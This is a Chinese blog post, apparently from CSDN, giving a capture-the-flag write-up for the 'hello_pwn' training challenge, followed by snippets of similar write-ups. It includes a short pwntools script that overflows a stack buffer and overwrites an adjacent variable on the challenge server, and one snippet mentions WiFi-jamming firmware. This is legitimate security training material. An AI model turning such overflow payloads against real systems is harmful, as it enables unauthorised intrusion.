[攻防世界 pwn]——hello_pwn

最新推荐文章于 2024-06-30 15:13:02 发布
最新推荐文章于 2024-06-30 15:13:02 发布
阅读量303 收藏
点赞数
分类专栏: # 攻防世界
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/113854210
版权
本文介绍了参与攻防世界CTF比赛时遇到的一道名为`hello_pwn15`的题目,该题目涉及栈溢出漏洞。通过使用IDA分析,发现可以利用栈溢出修改内存中的特定地址。提供的exploit代码展示了如何构造payload,发送 payload 到远程服务器(111.200.241.244:35304),并成功交互以利用该漏洞。
摘要由CSDN通过智能技术生成

[攻防世界 pwn]——hello_pwn15

IDA, 利用栈溢出修改dword_60106C就好距离为4
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

exploit

from pwn import *
#p = process("./pwn")
p = remote("111.200.241.244",35304)
payload = 'a'*4 + p64(0x6e756161)
p.sendline(payload)
p.interactive()
Y-peak
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
攻防世界pwn-hello_pwn
a_silly_coder的博客
01-16 1927
下载文件后,首先检查保护: 将文件拖入64位ida,查看代码 基本逻辑是:读取一个输入,存入unk_601068,接着比较dword_60106C是否等于一个预期的值,如果相等,执行对应函数,函数内直接执行cat flag.txt 所以思路就是需要覆盖dword_60106C,让其等于预期值,此时我们需要在输入unk_601068时,对dword_60106C进行覆盖,接着我们查看这两个值的存放位置。 发现这两个值之间相隔4个字节,所以需要4个字节的填充数据,接着输入预期值。..
hello_pwn
wuyvle的博客
01-23 407
hello_pwn 老惯例放进Linux康康 可见是个64位,且没有金丝雀(狂喜 ) 放进ida64康康 这有个read函数,进去康康 分析main函数 要使dword_60106C == 1853186401 才能得到flag 但我们只能给unk_601068赋值,怎么办? 这就用上栈溢出了,让我们再看看堆栈 两者之间差(ox6c-0x68)这之间数据填满;让unk_601068的值占到dword_60106C的位置 开始写脚本 比较简单 ...
攻防世界 hello_pwn
最新发布
weixin_73399382的博客
06-30 352
然后从指针&unk_601068指定的缓冲区里面读取最多16位数据(0x10uLL解读:0x代表十六进制,uLL=unsigned long long,无符号long long 型,10转为十进制即为16)直接执行一下,这里看别人的wp是可以通过输入构造字符串来getshell的,我这里就不这么做了,多练写脚本的能力。国际惯例checksec一下,64位小端序,未开启栈溢出保护和地址随机化,很明显这道题利用栈溢出了。刚学pwn的小白,大家互相学习,看看哪里说得不对打在评论区!写脚本,下面两个略微差别。
攻防世界-PWN-hello_pwn
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
09-24 500
开始进军PWN题 目录 分析 拖入IDA exp 分析 使用 file 和 checksec(查看程序的保护机制) 指令分析文件 x86-64 架构 Linux可执行文件ELF checksec参数 Arch 程序架构信息。这里是amd64-64的 RELRO 主要针对 GOT 改写的攻击方式的保护 RELRO为” Partial RELRO”,说明我们对GOT表具有写权限。 这里也没作保护 Stack 栈保护 这里没有启用 NX 栈没有执行权限 这里是打开的 PI.
hello pwn
Fiverya的博客
03-08 459
首先打开IDA,拖入程序 可以看到一个很简单的程序。 getshell函数如下: getshell 函数地址: 在hello函数处下断点: 调试到read处,确定溢出点。 payload如下: ...
awd攻防比赛总结——3s_NwGeek.docx
09-30
首先,作者介绍了比赛的规则和环境,包括多个环境、Web 和 Pwn 等。然后,作者分享了自己的战略和技巧,其中包括挖洞、补洞、溯源分析和可持续访问等。 在比赛中,作者遇到了很多的问题,例如服务器Environment会...
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出这是一个关于 "AVR系列单片机Mage8PWM脉冲输出程序" 的资源。这意味着主要关注的是 AVR 系列...
攻防世界 - pwn - hello_pwn
qq726232111的博客
03-16 426
A、程序分析 1、缓冲区地址为601068h 2、判断条件 --> 60106Ch为起始地址 , 存储6E756161h 3、判断条件成立执行cat flag B、利用分析 1、601068h -60106Bh --> 4byte 填充数据 60106Ch - 60106Fh --> 4byte 判断条件 0x6E756161 ...
攻防世界 pwn 新手练习区 hello_pwn
ChaoYue_miku的博客
07-06 523
题目来源: NUAACTF 题目描述:pwn!,segment fault!菜鸡陷入了深思 ** 0、下载附件,使用checksec检查保护情况,尝试打开文件 ** 开启了NX部分RELRO ** 1、使用IDA 64 Pro打开文件 ** 查看main函数 发现了一个read函数,查看一下unk_601068的栈结构 这里是存在栈溢出的,只要覆盖4个字节的内容就可以更改dword_60106C的内容。 接着往后查看main函数: 有一个if条件判断,只要满足dword_60106C == 18531
攻防世界pwn新手练习区-hello_pwn
CSDN_sunrise的博客
08-28 694
hello_pwn查看基本信息并运行文件 查看基本信息并运行文件
hello_pwn(xctf)
weixin_43868725的博客
05-06 621
0x0 程序保护和流程 保护: 流程: subsub_400686(): 当dword_60106C = 1853186401 时进入subsub_400686()函数获得flag。 0x1 利用 仔细分析后可以发现 两个数据是相邻的,我们可以通过read函数改写dword_60106C的值从而获得flag。unk_601068和dword_60106C 只相差四个字节,read函数可以输...
攻防世界pwn刷题--hello_pwn
m0_74073577的博客
09-29 173
0x60106c-0x611068=4个字节,那么输入4个a就可以到达目标地址(python里b’a‘的长度是一个字节),再输入‘nuaa‘即可,需要注意的是checksec后是小端序,绝大部分题目都是小端序,所以数据高位应该在地址低位,即输入’aaun‘,总体的payload应该是aaaa+aaun,如果暂时无法理解这个亦可以使用pwntools工具,使用p64打包数据即可,这样的话payload应该是payload=b’a‘*4+p64(0x6E756161),这个0x6E。结果是‘nuaa’。
攻防世界-hello_pwn
qq_52333044的博客
06-22 252
第一种:通过先输入四给任意字符再输入"aaun" (为什么是aaun呢,因为小端序和大端序的问题,小端序低地址存低位,大端序就是低地址存高位,这里采用小端序)unk-601068和dword——60106C相差4 个字节,然后我们可以通过覆盖来改变dwod_60106c的赋值。发现当unk_601068等于nuaa时才能得到flag。习惯性的用ls没有什么用,然后查看是多少位。然后用64位IDA打开查看程序。用kali linux 打开。第二种:就直接写exp。
攻防世界hello_pwn
2301_80216972的博客
04-09 312
pe分析知道是elf文件(elf文件是Linux下的可执行文件,可以在Linux直接运行)ida分析:下载后ida打开找到main函数,F5反编译。
攻防世界 pwn repeater
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于repeater题目,根据引用中提供的代码,该题目涉及到了远程攻击和内存溢出的技术。代码中使用了pwn工具包来进行远程连接和漏洞利用。通过发送一段恶意输入,攻击者可以覆盖程序的返回地址,使得程序执行恶意的shellcode。 具体地说,代码中通过发送一系列的输入,包括恶意shellcode,使得程序发生内存溢出,覆盖了主函数的返回地址,从而让主函数正常退出,并跳转到shellcode的首条指令处。 在此过程中,使用了pwn工具包中的一些功能,如远程连接、编码shellcode等。代码中也展示了一些具体的操作步骤,如发送输入、计算地址等。 综上所述,攻防世界中的pwn和repeater题目分别涉及到了漏洞利用和内存溢出的技术。通过精心构造的输入,攻击者可以利用程序的漏洞来执行恶意代码。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值